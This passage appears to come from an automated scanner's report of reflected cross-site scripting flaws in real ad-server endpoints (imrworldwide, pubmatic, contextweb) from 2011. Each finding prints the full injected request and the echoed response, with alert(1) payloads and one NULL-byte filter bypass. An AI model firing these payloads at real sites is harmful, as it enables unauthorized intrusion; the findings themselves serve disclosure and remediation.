P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner3c006"-alert(1)-"dd298267831&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null
...[SNIP]...

4.179. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f463a"-alert(1)-"f45a2ffc33 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=imagef463a"-alert(1)-"f45a2ffc33&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:38 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 753

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=imagef463a"-alert(1)-"f45a2ffc33&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.s
...[SNIP]...

4.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008c5d0'-alert(1)-'3f6e1d52c9e was submitted in the frameName parameter. This input was echoed as 8c5d0'-alert(1)-'3f6e1d52c9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=%008c5d0'-alert(1)-'3f6e1d52c9e&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1463
Date: Sat, 17 Sep 2011 01:22:43 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:43 GMT; path=/

document.write('<div id="%008c5d0'-alert(1)-'3f6e1d52c9e" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgAAAGgMAANgCAABaAAAABwAAAAEAAAABAAAANTU3ODUzMDctQTV
...[SNIP]...

4.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68f64'-alert(1)-'8bff147e83 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame1273302733168f64'-alert(1)-'8bff147e83&kltstamp=2011-8-17%201%3A1%3A57&ranreq=0.33281714585609734&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=202x859&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; USCC=ONE; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:14:02 GMT
Content-Length: 1453
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:14:02 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:14:02 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame1273302733168f64'-alert(1)-'8bff147e83" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgQAAiAAAAKAAAABYAgAACgAAAAAAAAAAAAAAAQAAADU1Nzg1MzA
...[SNIP]...

4.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 574e2'-alert(1)-'c6bdf911e23 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg574e2'-alert(1)-'c6bdf911e23&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A1%3A57&ranreq=0.33281714585609734&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=202x859&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; USCC=ONE; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:13:58 GMT
Content-Length: 1450
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:13:57 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:13:58 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...
equecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1316222038&indirectAdId=33028&adServerOptimizerId=1&ranreq=0.33281714585609734&imprCap=1&pageURL=http://bostonherald.com/includes/processAds.bg574e2'-alert(1)-'c6bdf911e23">
...[SNIP]...

4.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e0af'-alert(1)-'a2ef15872ee was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A1%3A57&ranreq=0.332817145856097343e0af'-alert(1)-'a2ef15872ee&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=202x859&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; USCC=ONE; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:14:11 GMT
Content-Length: 1450
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:14:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:14:11 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...
23101&adServerId=136&kefact=1.033110&kpbmtpfact=0.000000&kadNetFrequecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1316222051&indirectAdId=33028&adServerOptimizerId=1&ranreq=0.332817145856097343e0af'-alert(1)-'a2ef15872ee&imprCap=1&pageURL=http://bostonherald.com/includes/processAds.bg">
...[SNIP]...

4.184. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe1a"%3balert(1)//03d482f839c was submitted in the action parameter. This input was echoed as afe1a";alert(1)//03d482f839c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADafe1a"%3balert(1)//03d482f839c&cwrun=200&cwadformat=300X250&cwpid=538518&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP206
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:11:02 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:10:37 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:17 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWADafe1a";alert(1)//03d482f839c";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538518";var ct="106142";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...

4.185. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e1f"%3balert(1)//8aa2b1a61a0 was submitted in the cwadformat parameter. This input was echoed as c1e1f";alert(1)//8aa2b1a61a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250c1e1f"%3balert(1)//8aa2b1a61a0&cwpid=538518&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:05:23 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8886
Date: Sat, 17 Sep 2011 01:10:42 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:22 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250c1e1f";alert(1)//8aa2b1a61a0";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538518";var ct="106142";var cf="300X250c1e1f";alert(1)//8aa2b1a61a0";var cn="1";var epid="";var esid="";

       String.prototyp
...[SNIP]...

4.186. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80d4d"%3balert(1)//f18a478238 was submitted in the cwheight parameter. This input was echoed as 80d4d";alert(1)//f18a478238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538518&cwwidth=300&cwheight=25080d4d"%3balert(1)//f18a478238&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:10:50 GMT
Content-Length: 8857
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:30 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="25080d4d";alert(1)//f18a478238";var cads="0";var cp="538518";var ct="106142";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

4.187. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7071"%3balert(1)//58147849e4a was submitted in the cwpid parameter. This input was echoed as f7071";alert(1)//58147849e4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538518f7071"%3balert(1)//58147849e4a&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
